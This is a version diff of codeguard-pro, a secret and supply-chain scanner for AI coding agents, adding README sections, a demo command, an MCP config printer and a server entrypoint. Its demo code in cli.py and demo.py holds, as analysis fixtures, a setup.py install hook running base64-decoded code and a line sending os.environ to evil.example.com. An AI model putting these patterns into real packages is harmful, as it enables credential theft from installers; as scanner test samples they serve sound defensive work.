codeguard-pro 0.3.0__tar.gz → 0.3.3__tar.gz

{codeguard_pro-0.3.0 → codeguard_pro-0.3.3}/PKG-INFO

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: codeguard-pro
-Version: 0.3.0
+Version: 0.3.3
 Summary: Inline security gate for AI coding agents: secrets, supply chain, OWASP, and MiniMax-assisted deep analysis.
 Home-page: https://github.com/Miles0sage/codeguard-mcp
 Author: Miles
@@ -31,9 +31,9 @@ Dynamic: summary
 
 # CodeGuard Pro
 
-> Stop secrets from reaching git. The inline security gate for AI coding agents.
+> The inline security gate for AI coding agents.
 
-AI coding agents (Claude Code, Cursor, Copilot) write code fast. Too fast to catch the AWS key they just hardcoded. CodeGuard sits **inline** -- agents call `security_gate` before every commit. Secrets get blocked, not just flagged.
+AI coding agents (Claude Code, Cursor, Copilot, IDE extensions, MCP-enabled tools) write and install fast. Too fast to reliably catch a hardcoded key, a malicious package, or an obfuscated setup hook. CodeGuard sits **inside that loop**: before install, before commit, and before shipping.
 
 ```
 $ git commit -m "add payment integration"
@@ -56,12 +56,40 @@ CodeGuard Pro — scanning for secrets...
 ## Quick Start
 
 ```bash
-pip install mcp[cli]
-git clone https://github.com/Miles0sage/codeguard-mcp && cd codeguard-mcp
+pipx install codeguard-pro
 codeguard install   # hooks into your repo's pre-commit
 ```
 
-That's it. Every `git commit` now scans for secrets automatically.
+That's the simple path. Every `git commit` now scans for secrets automatically.
+
+If you prefer a virtualenv:
+
+```bash
+python3 -m venv .venv
+. .venv/bin/activate
+pip install codeguard-pro
+```
+
+If you want a quick product demo:
+
+```bash
+codeguard demo
+```
+
+If you want the MCP server locally:
+
+```bash
+codeguard-mcp
+```
+
+## Why People Will Use It
+
+- **Simple install**: `pipx install codeguard-pro` or install inside a `venv`
+- **PEP 668 friendly**: works cleanly with `pipx` or inside a `venv`
+- **Agent-focused**: built for Claude/Codex/Cursor-style workflows, not just CI
+- **Real demos**: see [`DEMO.md`](DEMO.md) for outputs captured from the current codebase
+- **Current attack relevance**: `.pth` startup hooks, mutable GitHub Action refs, compromised packages, behavioral setup hooks
+- **Fast feedback loop**: suspicious misses can become saved samples, issue drafts, and regression tests
 
 ## Features
 
@@ -99,19 +127,42 @@ What it is not yet:
 
 ## MCP Integration
 
-Add to your Claude Code config (`~/.claude.json`):
+The packaged MCP command is:
+
+```bash
+codeguard-mcp
+```
+
+If you run it directly in a terminal, it will print a short hint instead of failing silently. For explicit server mode:
+
+```bash
+codeguard-mcp --stdio
+```
+
+Print a ready-to-paste config snippet:
+
+```bash
+codeguard mcp-config
+codeguard mcp-config --client claude
+codeguard mcp-config --client vscode
+codeguard mcp-config --client codex
+```
+
+Generic MCP config:
 
 ```json
 {
   "mcpServers": {
     "codeguard": {
-      "command": "python3",
-      "args": ["/path/to/codeguard-mcp/server.py"]
+      "command": "codeguard-mcp",
+      "args": []
     }
   }
 }
 ```
 
+Client-specific UIs and file locations vary. The important part is the command: point the MCP client at `codeguard-mcp`.
+
 ### 23 MCP Tools
 
 | Tool | Purpose |
@@ -144,10 +195,13 @@ Add to your Claude Code config (`~/.claude.json`):
 ### How Agents Use It
 
 ```
-Agent writes code
+Agent writes code / wants to install a package
        |
        v
-Agent runs: security_gate(diff)
+Agent runs:
+  - scan_package() before install
+  - security_gate(diff) before commit
+  - smart_analyze(code) for risky code
        |
   +----+----+
   |         |
@@ -174,10 +228,13 @@ The agent gets structured JSON back:
 ## CLI Usage
 
 ```bash
+codeguard init              # Install hook, config, and print next steps
 codeguard install           # Install pre-commit hook
 codeguard scan ./src        # Scan a directory
 codeguard scan app.py       # Scan a single file
 codeguard scan-diff         # Scan staged changes
+codeguard check litellm     # Check a package before install
+codeguard mcp-config        # Print MCP config snippet
 codeguard learn-add sample.py --title "obfuscated setup hook"
 codeguard learn-summary
 codeguard uninstall         # Remove hook (restores backup)
@@ -193,6 +250,33 @@ Use `smart_analyze` as the default code-analysis entry point:
 
 That keeps cost and latency low while still giving you deeper analysis when regex alone is not enough.
 
+## Real Demo
+
+See [`DEMO.md`](DEMO.md) for:
+- deterministic email-injection detection
+- MiniMax setup.py malware verdict
+- MiniMax credential-exfiltration detection
+- verified test totals used in the current release
+
+## Benchmarks
+
+Current verified benchmark:
+
+- `pytest -q test_*.py` -> `112 passed, 6 skipped`
+- fresh virtualenv install works
+- `codeguard init` works in a new git repo
+- `codeguard demo` works from the installed package
+- clean code stays clean on the fast path
+- adversarial install/injection samples are caught or escalated
+
+See [`TESTING.md`](TESTING.md) for the benchmark definition and what the numbers mean.
+
+You can also run the local demo directly:
+
+```bash
+codeguard demo
+```
+
 ## AI Beta
 
 MiniMax is wired directly to the official MiniMax API using `MINIMAX_API_KEY`.
@@ -215,6 +299,12 @@ CodeGuard is strongest when positioned as the security gate that sits *inside* t
 - before commit
 - before shipping
 
+Visible current-attack angle:
+- TeamPCP-style package compromise
+- `.pth` startup-hook abuse
+- GitHub Actions mutable ref poisoning
+- faster package installs driven by AI agents
+
 Current verified beta capabilities:
 - setup-hook malware verdicts for obfuscated `exec(base64.b64decode(...))` patterns
 - behavioral credential exfiltration detection
@@ -238,6 +328,21 @@ Recommended flow:
 
 This keeps the product getting smarter without turning it into an opaque self-editing scanner.
 
+## Feedback Loop From Misses To Tests
+
+This is the intended improvement loop:
+
+1. detect a miss or suspicious sample in the real world
+2. save it with `codeguard learn-add`
+3. generate an issue draft with `codeguard learn-report`
+4. decide whether it needs:
+   - a deterministic rule
+   - an AI prompt change
+   - a documented limitation
+5. add a regression test before promoting the change
+
+That is how CodeGuard gets better without becoming untrustworthy.
+
 ## Secret Patterns (25+)
 
 | Provider | Pattern | Severity |

{codeguard_pro-0.3.0 → codeguard_pro-0.3.3}/README.md

@@ -7,9 +7,9 @@
 
 # CodeGuard Pro
 
-> Stop secrets from reaching git. The inline security gate for AI coding agents.
+> The inline security gate for AI coding agents.
 
-AI coding agents (Claude Code, Cursor, Copilot) write code fast. Too fast to catch the AWS key they just hardcoded. CodeGuard sits **inline** -- agents call `security_gate` before every commit. Secrets get blocked, not just flagged.
+AI coding agents (Claude Code, Cursor, Copilot, IDE extensions, MCP-enabled tools) write and install fast. Too fast to reliably catch a hardcoded key, a malicious package, or an obfuscated setup hook. CodeGuard sits **inside that loop**: before install, before commit, and before shipping.
 
 ```
 $ git commit -m "add payment integration"
@@ -32,12 +32,40 @@ CodeGuard Pro — scanning for secrets...
 ## Quick Start
 
 ```bash
-pip install mcp[cli]
-git clone https://github.com/Miles0sage/codeguard-mcp && cd codeguard-mcp
+pipx install codeguard-pro
 codeguard install   # hooks into your repo's pre-commit
 ```
 
-That's it. Every `git commit` now scans for secrets automatically.
+That's the simple path. Every `git commit` now scans for secrets automatically.
+
+If you prefer a virtualenv:
+
+```bash
+python3 -m venv .venv
+. .venv/bin/activate
+pip install codeguard-pro
+```
+
+If you want a quick product demo:
+
+```bash
+codeguard demo
+```
+
+If you want the MCP server locally:
+
+```bash
+codeguard-mcp
+```
+
+## Why People Will Use It
+
+- **Simple install**: `pipx install codeguard-pro` or install inside a `venv`
+- **PEP 668 friendly**: works cleanly with `pipx` or inside a `venv`
+- **Agent-focused**: built for Claude/Codex/Cursor-style workflows, not just CI
+- **Real demos**: see [`DEMO.md`](DEMO.md) for outputs captured from the current codebase
+- **Current attack relevance**: `.pth` startup hooks, mutable GitHub Action refs, compromised packages, behavioral setup hooks
+- **Fast feedback loop**: suspicious misses can become saved samples, issue drafts, and regression tests
 
 ## Features
 
@@ -75,19 +103,42 @@ What it is not yet:
 
 ## MCP Integration
 
-Add to your Claude Code config (`~/.claude.json`):
+The packaged MCP command is:
+
+```bash
+codeguard-mcp
+```
+
+If you run it directly in a terminal, it will print a short hint instead of failing silently. For explicit server mode:
+
+```bash
+codeguard-mcp --stdio
+```
+
+Print a ready-to-paste config snippet:
+
+```bash
+codeguard mcp-config
+codeguard mcp-config --client claude
+codeguard mcp-config --client vscode
+codeguard mcp-config --client codex
+```
+
+Generic MCP config:
 
 ```json
 {
   "mcpServers": {
     "codeguard": {
-      "command": "python3",
-      "args": ["/path/to/codeguard-mcp/server.py"]
+      "command": "codeguard-mcp",
+      "args": []
     }
   }
 }
 ```
 
+Client-specific UIs and file locations vary. The important part is the command: point the MCP client at `codeguard-mcp`.
+
 ### 23 MCP Tools
 
 | Tool | Purpose |
@@ -120,10 +171,13 @@ Add to your Claude Code config (`~/.claude.json`):
 ### How Agents Use It
 
 ```
-Agent writes code
+Agent writes code / wants to install a package
        |
        v
-Agent runs: security_gate(diff)
+Agent runs:
+  - scan_package() before install
+  - security_gate(diff) before commit
+  - smart_analyze(code) for risky code
        |
   +----+----+
   |         |
@@ -150,10 +204,13 @@ The agent gets structured JSON back:
 ## CLI Usage
 
 ```bash
+codeguard init              # Install hook, config, and print next steps
 codeguard install           # Install pre-commit hook
 codeguard scan ./src        # Scan a directory
 codeguard scan app.py       # Scan a single file
 codeguard scan-diff         # Scan staged changes
+codeguard check litellm     # Check a package before install
+codeguard mcp-config        # Print MCP config snippet
 codeguard learn-add sample.py --title "obfuscated setup hook"
 codeguard learn-summary
 codeguard uninstall         # Remove hook (restores backup)
@@ -169,6 +226,33 @@ Use `smart_analyze` as the default code-analysis entry point:
 
 That keeps cost and latency low while still giving you deeper analysis when regex alone is not enough.
 
+## Real Demo
+
+See [`DEMO.md`](DEMO.md) for:
+- deterministic email-injection detection
+- MiniMax setup.py malware verdict
+- MiniMax credential-exfiltration detection
+- verified test totals used in the current release
+
+## Benchmarks
+
+Current verified benchmark:
+
+- `pytest -q test_*.py` -> `112 passed, 6 skipped`
+- fresh virtualenv install works
+- `codeguard init` works in a new git repo
+- `codeguard demo` works from the installed package
+- clean code stays clean on the fast path
+- adversarial install/injection samples are caught or escalated
+
+See [`TESTING.md`](TESTING.md) for the benchmark definition and what the numbers mean.
+
+You can also run the local demo directly:
+
+```bash
+codeguard demo
+```
+
 ## AI Beta
 
 MiniMax is wired directly to the official MiniMax API using `MINIMAX_API_KEY`.
@@ -191,6 +275,12 @@ CodeGuard is strongest when positioned as the security gate that sits *inside* t
 - before commit
 - before shipping
 
+Visible current-attack angle:
+- TeamPCP-style package compromise
+- `.pth` startup-hook abuse
+- GitHub Actions mutable ref poisoning
+- faster package installs driven by AI agents
+
 Current verified beta capabilities:
 - setup-hook malware verdicts for obfuscated `exec(base64.b64decode(...))` patterns
 - behavioral credential exfiltration detection
@@ -214,6 +304,21 @@ Recommended flow:
 
 This keeps the product getting smarter without turning it into an opaque self-editing scanner.
 
+## Feedback Loop From Misses To Tests
+
+This is the intended improvement loop:
+
+1. detect a miss or suspicious sample in the real world
+2. save it with `codeguard learn-add`
+3. generate an issue draft with `codeguard learn-report`
+4. decide whether it needs:
+   - a deterministic rule
+   - an AI prompt change
+   - a documented limitation
+5. add a regression test before promoting the change
+
+That is how CodeGuard gets better without becoming untrustworthy.
+
 ## Secret Patterns (25+)
 
 | Provider | Pattern | Severity |

{codeguard_pro-0.3.0 → codeguard_pro-0.3.3}/cli.py

@@ -6,6 +6,8 @@ Usage:
     codeguard install          Install pre-commit hook in current repo
     codeguard scan <path>      Scan a file or directory for secrets
     codeguard scan-diff        Scan staged git diff for secrets
+    codeguard demo             Run a local product demo
+    codeguard mcp-config       Print MCP config snippet for CodeGuard
     codeguard learn-add        Save a suspicious sample for later review
     codeguard learn-report     Generate an issue-ready markdown report
     codeguard learn-summary    Summarize the local learning corpus
@@ -293,7 +295,11 @@ def cmd_init(policy: str = "standard"):
         print(f"  Auto-fix model:    {config['autofix_model']}")
     print(f"  Block on CRITICAL: {'YES' if config.get('block_on_critical') else 'NO'}")
     print(f"  Block on HIGH:     {'YES' if config.get('block_on_high') else 'NO'}")
-    print(f"\nRun {BOLD}codeguard scan .{RESET} to scan your project now.")
+    print(f"\n{BOLD}Next steps{RESET}")
+    print(f"  1. Run {BOLD}codeguard scan .{RESET} to scan your project now.")
+    print(f"  2. Run {BOLD}codeguard check <package>{RESET} before installing new dependencies.")
+    print(f"  3. Run {BOLD}codeguard mcp-config{RESET} to connect Claude/Codex/Cursor/VS Code MCP clients.")
+    print(f"  4. Run {BOLD}codeguard demo{RESET} to see the layered scanner output.")
 
 
 def cmd_check(packages: list, registry: str = "pypi"):
@@ -398,6 +404,61 @@ def cmd_learn_summary(corpus_dir: str = "learning"):
     print(json.dumps(corpus_summary(corpus_dir), indent=2))
 
 
+def cmd_demo():
+    """Run a concise local demo of CodeGuard's core flows."""
+    from agent_analyzer import smart_analyze, analyze_setup_py, deep_analyze
+
+    email_sample = "send_mail(request.form['subject'], body, 'noreply@example.com', [to])"
+    setup_sample = """from setuptools import setup
+from setuptools.command.install import install
+import base64
+
+class PostInstall(install):
+    def run(self):
+        install.run(self)
+        exec(base64.b64decode('aW1wb3J0IG9zLHNvY2tldA=='))
+
+setup(name="totally-legit", version="1.0", cmdclass={"install": PostInstall})
+"""
+    exfil_sample = """import os, urllib.request
+data = str(dict(os.environ))
+urllib.request.urlopen("http://evil.example.com/collect?d=" + data)
+"""
+
+    demo = {
+        "email_injection": smart_analyze(email_sample, explain_requested=False),
+        "setup_behavior": analyze_setup_py(setup_sample),
+        "credential_exfiltration": deep_analyze(exfil_sample),
+    }
+    print(json.dumps(demo, indent=2))
+
+
+def cmd_mcp_config(server_command: str = "codeguard-mcp", client: str = "generic"):
+    """Print a minimal MCP config snippet for popular clients."""
+    config = {
+        "mcpServers": {
+            "codeguard": {
+                "command": server_command,
+                "args": [],
+            }
+        }
+    }
+
+    notes = {
+        "generic": "Use this JSON in any MCP client that accepts a command-based server definition.",
+        "claude": "Add this server entry to your Claude Code MCP configuration.",
+        "cursor": "Add this server entry in Cursor's MCP settings or config file.",
+        "vscode": "Use this command in any VS Code MCP extension or MCP client configuration.",
+        "codex": "Use this command in any Codex-compatible MCP client configuration.",
+    }
+
+    print(json.dumps({
+        "client": client,
+        "note": notes.get(client, notes["generic"]),
+        "config": config,
+    }, indent=2))
+
+
 def main():
     parser = argparse.ArgumentParser(
         prog="codeguard",
@@ -419,6 +480,11 @@ def main():
     scan_p.add_argument("path", help="File or directory to scan")
 
     sub.add_parser("scan-diff", help="Scan staged git diff")
+    sub.add_parser("demo", help="Run a local demo")
+
+    mcp_p = sub.add_parser("mcp-config", help="Print MCP config snippet")
+    mcp_p.add_argument("--client", choices=["generic", "claude", "cursor", "vscode", "codex"], default="generic")
+    mcp_p.add_argument("--server-command", default="codeguard-mcp", help="Server command to run in the MCP client")
 
     check_p = sub.add_parser("check", help="Scan packages BEFORE installing")
     check_p.add_argument("packages", nargs="+", help="Package names to check")
@@ -449,6 +515,10 @@ def main():
         cmd_scan(args.path)
     elif args.command == "scan-diff":
         cmd_scan_diff()
+    elif args.command == "demo":
+        cmd_demo()
+    elif args.command == "mcp-config":
+        cmd_mcp_config(args.server_command, args.client)
     elif args.command == "check":
         cmd_check(args.packages, registry="npm" if args.npm else "pypi")
     elif args.command == "learn-add":

{codeguard_pro-0.3.0 → codeguard_pro-0.3.3}/codeguard_pro.egg-info/PKG-INFO

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: codeguard-pro
-Version: 0.3.0
+Version: 0.3.3
 Summary: Inline security gate for AI coding agents: secrets, supply chain, OWASP, and MiniMax-assisted deep analysis.
 Home-page: https://github.com/Miles0sage/codeguard-mcp
 Author: Miles
@@ -31,9 +31,9 @@ Dynamic: summary
 
 # CodeGuard Pro
 
-> Stop secrets from reaching git. The inline security gate for AI coding agents.
+> The inline security gate for AI coding agents.
 
-AI coding agents (Claude Code, Cursor, Copilot) write code fast. Too fast to catch the AWS key they just hardcoded. CodeGuard sits **inline** -- agents call `security_gate` before every commit. Secrets get blocked, not just flagged.
+AI coding agents (Claude Code, Cursor, Copilot, IDE extensions, MCP-enabled tools) write and install fast. Too fast to reliably catch a hardcoded key, a malicious package, or an obfuscated setup hook. CodeGuard sits **inside that loop**: before install, before commit, and before shipping.
 
 ```
 $ git commit -m "add payment integration"
@@ -56,12 +56,40 @@ CodeGuard Pro — scanning for secrets...
 ## Quick Start
 
 ```bash
-pip install mcp[cli]
-git clone https://github.com/Miles0sage/codeguard-mcp && cd codeguard-mcp
+pipx install codeguard-pro
 codeguard install   # hooks into your repo's pre-commit
 ```
 
-That's it. Every `git commit` now scans for secrets automatically.
+That's the simple path. Every `git commit` now scans for secrets automatically.
+
+If you prefer a virtualenv:
+
+```bash
+python3 -m venv .venv
+. .venv/bin/activate
+pip install codeguard-pro
+```
+
+If you want a quick product demo:
+
+```bash
+codeguard demo
+```
+
+If you want the MCP server locally:
+
+```bash
+codeguard-mcp
+```
+
+## Why People Will Use It
+
+- **Simple install**: `pipx install codeguard-pro` or install inside a `venv`
+- **PEP 668 friendly**: works cleanly with `pipx` or inside a `venv`
+- **Agent-focused**: built for Claude/Codex/Cursor-style workflows, not just CI
+- **Real demos**: see [`DEMO.md`](DEMO.md) for outputs captured from the current codebase
+- **Current attack relevance**: `.pth` startup hooks, mutable GitHub Action refs, compromised packages, behavioral setup hooks
+- **Fast feedback loop**: suspicious misses can become saved samples, issue drafts, and regression tests
 
 ## Features
 
@@ -99,19 +127,42 @@ What it is not yet:
 
 ## MCP Integration
 
-Add to your Claude Code config (`~/.claude.json`):
+The packaged MCP command is:
+
+```bash
+codeguard-mcp
+```
+
+If you run it directly in a terminal, it will print a short hint instead of failing silently. For explicit server mode:
+
+```bash
+codeguard-mcp --stdio
+```
+
+Print a ready-to-paste config snippet:
+
+```bash
+codeguard mcp-config
+codeguard mcp-config --client claude
+codeguard mcp-config --client vscode
+codeguard mcp-config --client codex
+```
+
+Generic MCP config:
 
 ```json
 {
   "mcpServers": {
     "codeguard": {
-      "command": "python3",
-      "args": ["/path/to/codeguard-mcp/server.py"]
+      "command": "codeguard-mcp",
+      "args": []
     }
   }
 }
 ```
 
+Client-specific UIs and file locations vary. The important part is the command: point the MCP client at `codeguard-mcp`.
+
 ### 23 MCP Tools
 
 | Tool | Purpose |
@@ -144,10 +195,13 @@ Add to your Claude Code config (`~/.claude.json`):
 ### How Agents Use It
 
 ```
-Agent writes code
+Agent writes code / wants to install a package
        |
        v
-Agent runs: security_gate(diff)
+Agent runs:
+  - scan_package() before install
+  - security_gate(diff) before commit
+  - smart_analyze(code) for risky code
        |
   +----+----+
   |         |
@@ -174,10 +228,13 @@ The agent gets structured JSON back:
 ## CLI Usage
 
 ```bash
+codeguard init              # Install hook, config, and print next steps
 codeguard install           # Install pre-commit hook
 codeguard scan ./src        # Scan a directory
 codeguard scan app.py       # Scan a single file
 codeguard scan-diff         # Scan staged changes
+codeguard check litellm     # Check a package before install
+codeguard mcp-config        # Print MCP config snippet
 codeguard learn-add sample.py --title "obfuscated setup hook"
 codeguard learn-summary
 codeguard uninstall         # Remove hook (restores backup)
@@ -193,6 +250,33 @@ Use `smart_analyze` as the default code-analysis entry point:
 
 That keeps cost and latency low while still giving you deeper analysis when regex alone is not enough.
 
+## Real Demo
+
+See [`DEMO.md`](DEMO.md) for:
+- deterministic email-injection detection
+- MiniMax setup.py malware verdict
+- MiniMax credential-exfiltration detection
+- verified test totals used in the current release
+
+## Benchmarks
+
+Current verified benchmark:
+
+- `pytest -q test_*.py` -> `112 passed, 6 skipped`
+- fresh virtualenv install works
+- `codeguard init` works in a new git repo
+- `codeguard demo` works from the installed package
+- clean code stays clean on the fast path
+- adversarial install/injection samples are caught or escalated
+
+See [`TESTING.md`](TESTING.md) for the benchmark definition and what the numbers mean.
+
+You can also run the local demo directly:
+
+```bash
+codeguard demo
+```
+
 ## AI Beta
 
 MiniMax is wired directly to the official MiniMax API using `MINIMAX_API_KEY`.
@@ -215,6 +299,12 @@ CodeGuard is strongest when positioned as the security gate that sits *inside* t
 - before commit
 - before shipping
 
+Visible current-attack angle:
+- TeamPCP-style package compromise
+- `.pth` startup-hook abuse
+- GitHub Actions mutable ref poisoning
+- faster package installs driven by AI agents
+
 Current verified beta capabilities:
 - setup-hook malware verdicts for obfuscated `exec(base64.b64decode(...))` patterns
 - behavioral credential exfiltration detection
@@ -238,6 +328,21 @@ Recommended flow:
 
 This keeps the product getting smarter without turning it into an opaque self-editing scanner.
 
+## Feedback Loop From Misses To Tests
+
+This is the intended improvement loop:
+
+1. detect a miss or suspicious sample in the real world
+2. save it with `codeguard learn-add`
+3. generate an issue draft with `codeguard learn-report`
+4. decide whether it needs:
+   - a deterministic rule
+   - an AI prompt change
+   - a documented limitation
+5. add a regression test before promoting the change
+
+That is how CodeGuard gets better without becoming untrustworthy.
+
 ## Secret Patterns (25+)
 
 | Provider | Pattern | Severity |

{codeguard_pro-0.3.0 → codeguard_pro-0.3.3}/codeguard_pro.egg-info/SOURCES.txt

@@ -2,6 +2,7 @@ README.md
 agent_analyzer.py
 autofix.py
 cli.py
+demo.py
 hook.py
 learning_loop.py
 secret_scanner.py

{codeguard_pro-0.3.0 → codeguard_pro-0.3.3}/codeguard_pro.egg-info/entry_points.txt

@@ -1,2 +1,3 @@
 [console_scripts]
 codeguard = cli:main
+codeguard-mcp = server:main

{codeguard_pro-0.3.0 → codeguard_pro-0.3.3}/codeguard_pro.egg-info/top_level.txt

@@ -1,6 +1,7 @@
 agent_analyzer
 autofix
 cli
+demo
 hook
 learning_loop
 secret_scanner

codeguard_pro-0.3.3/demo.py

@@ -0,0 +1,36 @@
+#!/usr/bin/env python3
+"""Runnable launch demo for CodeGuard Pro."""
+
+import json
+
+from agent_analyzer import analyze_setup_py, deep_analyze, smart_analyze
+
+
+def main() -> None:
+    email_sample = "send_mail(request.form['subject'], body, 'noreply@example.com', [to])"
+    setup_sample = """from setuptools import setup
+from setuptools.command.install import install
+import base64
+
+class PostInstall(install):
+    def run(self):
+        install.run(self)
+        exec(base64.b64decode('aW1wb3J0IG9zLHNvY2tldA=='))
+
+setup(name="totally-legit", version="1.0", cmdclass={"install": PostInstall})
+"""
+    exfil_sample = """import os, urllib.request
+data = str(dict(os.environ))
+urllib.request.urlopen("http://evil.example.com/collect?d=" + data)
+"""
+
+    result = {
+        "email_injection": smart_analyze(email_sample),
+        "setup_behavior": analyze_setup_py(setup_sample),
+        "credential_exfiltration": deep_analyze(exfil_sample),
+    }
+    print(json.dumps(result, indent=2))
+
+
+if __name__ == "__main__":
+    main()

{codeguard_pro-0.3.0 → codeguard_pro-0.3.3}/server.py

@@ -5,7 +5,9 @@ Catches secrets, OWASP vulns, and blocks bad commits with fix suggestions.
 """
 
 import os
+import sys
 import json
+import argparse
 from mcp.server.fastmcp import FastMCP
 
 
@@ -539,6 +541,32 @@ def create_server():
     return mcp
 
 
-if __name__ == "__main__":
+def main():
+    """Run the packaged MCP server entrypoint."""
+    parser = argparse.ArgumentParser(
+        prog="codeguard-mcp",
+        description="CodeGuard Pro MCP server. Run this from an MCP client such as Claude Code, Codex, Cursor, or a VS Code MCP extension.",
+    )
+    parser.add_argument(
+        "--stdio",
+        action="store_true",
+        help="Run the MCP server over stdio. This is the default mode used by MCP clients.",
+    )
+    args = parser.parse_args()
+
+    if sys.stdin.isatty() and not args.stdio:
+        print(
+            "CodeGuard Pro MCP server\n\n"
+            "This command is meant to be launched by an MCP client over stdio.\n"
+            "Use `codeguard mcp-config` to print a client config snippet.\n"
+            "Use `codeguard-mcp --stdio` to run the server explicitly.\n",
+            file=sys.stderr,
+        )
+        return
+
     mcp = create_server()
     mcp.run()
+
+
+if __name__ == "__main__":
+    main()

{codeguard_pro-0.3.0 → codeguard_pro-0.3.3}/setup.py

@@ -5,7 +5,7 @@ README = Path(__file__).with_name("README.md").read_text(encoding="utf-8")
 
 setup(
     name="codeguard-pro",
-    version="0.3.0",
+    version="0.3.3",
     description="Inline security gate for AI coding agents: secrets, supply chain, OWASP, and MiniMax-assisted deep analysis.",
     author="Miles",
     url="https://github.com/Miles0sage/codeguard-mcp",
@@ -22,10 +22,12 @@ setup(
         "autofix",
         "agent_analyzer",
         "learning_loop",
+        "demo",
     ],
     entry_points={
         "console_scripts": [
             "codeguard=cli:main",
+            "codeguard-mcp=server:main",
         ],
     },
     python_requires=">=3.10",